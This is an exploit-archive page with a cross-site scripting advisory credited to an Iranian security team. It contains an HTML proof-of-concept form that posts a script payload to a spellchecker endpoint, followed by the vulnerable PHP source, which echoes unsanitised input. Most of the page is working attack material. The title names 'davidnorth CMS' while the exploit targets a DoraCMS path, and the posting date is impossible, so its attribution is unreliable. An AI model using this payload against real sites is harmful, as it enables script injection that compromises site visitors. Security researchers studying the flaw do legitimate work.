Home / exploitsPDF  

Davidnorth CMS cross site scripting vulnerability

Posted on 30 November -0001

<HTML><HEAD><TITLE>davidnorth CMS cross site scripting vulnerability</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |=============================================================| |[+] Exploit Title: davidnorth cms cross site scripting vulnerability |[+] |[+] Exploit Author: Ashiyane Digital Security Team |[+] |[+] Download Link : https://github.com/davidnorth/cms |[+] |[+] Tested on: Kali Linux |[+] |[+] Date: 12 /30 / 2016 |=============================================================| |[+] Exploit Code: <HTML> <HEAD><TITLE>DoraCMS Cross Site Scripting</TITLE></HEAD> <BODY> <form action="http://127.0.0.1/DoraCMS-master/public/plugins/ztree/demo/cn/asyncData/getNodes.php" method="post"> <input type="hidden" name="textinputs" value="'"/><ScRiPt >alert('M.R.S.L.Y')</ScRiPt>"/> </form> </BODY> </HTML> ============================================================| Vulnerable code : <?php header('Content-type: text/html; charset=utf-8'); // The following variables values must reflect your installation needs. $aspell_prog = '"C:Program FilesAspellbinaspell.exe"'; // by FredCK (for Windows) //$aspell_prog = 'aspell'; // by FredCK (for Linux) $lang = 'en_US'; $aspell_opts = "-a --lang=$lang --encoding=utf-8 -H --rem-sgml-check=alt"; // by FredCK $tempfiledir = "./"; $spellercss = '../spellerStyle.css'; // by FredCK $word_win_src = '../wordWindow.js'; // by FredCK $textinputs = $_POST['textinputs']; # array $input_separator = "A"; # set the JavaScript variable to the submitted text. # textinputs is an array, each element corresponding to the (url-encoded) # value of the text control submitted for spell-checking function print_textinputs_var() { global $textinputs; foreach( $textinputs as $key=>$val ) { # $val = str_replace( "'", "%27", $val ); echo "textinputs[$key] = decodeURIComponent("" . $val . ""); "; } } # make declarations for the text input index function print_textindex_decl( $text_input_idx ) { echo "words[$text_input_idx] = []; "; echo "suggs[$text_input_idx] = []; "; } # set an element of the JavaScript 'words' array to a misspelled word function print_words_elem( $word, $index, $text_input_idx ) { echo "words[$text_input_idx][$index] = '" . escape_quote( $word ) . "'; "; } # set an element of the JavaScript 'suggs' array to a list of suggestions function print_suggs_elem( $suggs, $index, $text_input_idx ) { echo "suggs[$text_input_idx][$index] = ["; foreach( $suggs as $key=>$val ) { if( $val ) { echo "'" . escape_quote( $val ) . "'"; if ( $key+1 < count( $suggs )) { echo ", "; } } } echo "]; "; } # escape single quote function escape_quote( $str ) { return preg_replace ( "/'/", "'", $str ); } # handle a server-side error. function error_handler( $err ) { echo "error = '" . preg_replace( "/['\]/", "\$0", $err ) . "'; "; } ## get the list of misspelled words. Put the results in the javascript words array ## for each misspelled word, get suggestions and put in the javascript suggs array function print_checker_results() { global $aspell_prog; global $aspell_opts; global $tempfiledir; global $textinputs; global $input_separator; $aspell_err = ""; # create temp file $tempfile = tempnam( $tempfiledir, 'aspell_data_' ); # open temp file, add the submitted text. if( $fh = fopen( $tempfile, 'w' )) { for( $i = 0; $i < count( $textinputs ); $i++ ) { $text = urldecode( $textinputs[$i] ); // Strip all tags for the text. (by FredCK - #339 / #681) $text = preg_replace( "/<[^>]+>/", " ", $text ) ; $lines = explode( " ", $text ); fwrite ( $fh, "% " ); # exit terse mode fwrite ( $fh, "^$input_separator " ); fwrite ( $fh, "! " ); # enter terse mode foreach( $lines as $key=>$value ) { # use carat on each line to escape possible aspell commands fwrite( $fh, "^$value " ); } } fclose( $fh ); # exec aspell command - redirect STDERR to STDOUT $cmd = "$aspell_prog $aspell_opts < $tempfile 2>&1"; if( $aspellret = shell_exec( $cmd )) { $linesout = explode( " ", $aspellret ); $index = 0; $text_input_index = -1; # parse each line of aspell return foreach( $linesout as $key=>$val ) { $chardesc = substr( $val, 0, 1 ); # if '&', then not in dictionary but has suggestions # if '#', then not in dictionary and no suggestions # if '*', then it is a delimiter between text inputs # if '@' then version info if( $chardesc == '&' || $chardesc == '#' ) { $line = explode( " ", $val, 5 ); print_words_elem( $line[1], $index, $text_input_index ); if( isset( $line[4] )) { $suggs = explode( ", ", $line[4] ); } else { $suggs = array(); } print_suggs_elem( $suggs, $index, $text_input_index ); $index++; } elseif( $chardesc == '*' ) { $text_input_index++; print_textindex_decl( $text_input_index ); $index = 0; } elseif( $chardesc != '@' && $chardesc != "" ) { # assume this is error output $aspell_err .= $val; } } if( $aspell_err ) { $aspell_err = "Error executing `$cmd` $aspell_err"; error_handler( $aspell_err ); } } else { error_handler( "System error: Aspell program execution failed (`$cmd`)" ); } } else { error_handler( "System error: Could not open file '$tempfile' for writing" ); } # close temp file, delete file unlink( $tempfile ); } ?> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <link rel="stylesheet" type="text/css" href="<?php echo $spellercss ?>" /> <script language="javascript" src="<?php echo $word_win_src ?>"></script> <script language="javascript"> var suggs = new Array(); var words = new Array(); var textinputs = new Array(); var error; <?php print_textinputs_var(); print_checker_results(); ?> var wordWindowObj = new wordWindow(); wordWindowObj.originalSpellings = words; wordWindowObj.suggestions = suggs; wordWindowObj.textInputs = textinputs; function init_spell() { // check if any error occured during server-side processing if( error ) { alert( error ); } else { // call the init_spell() function in the parent frameset if (parent.frames.length) { parent.init_spell( wordWindowObj ); } else { alert('This page was loaded outside of a frameset. It might not display properly'); } } } </script> </head> <!-- <body onLoad="init_spell();"> by FredCK --> <body onLoad="init_spell();" bgcolor="#ffffff"> <script type="text/javascript"> wordWindowObj.writeBody(); </script> </body> </html> |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |[+] Discovered By : M.R.S.L.Y |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|</BODY></HTML>

 

TOP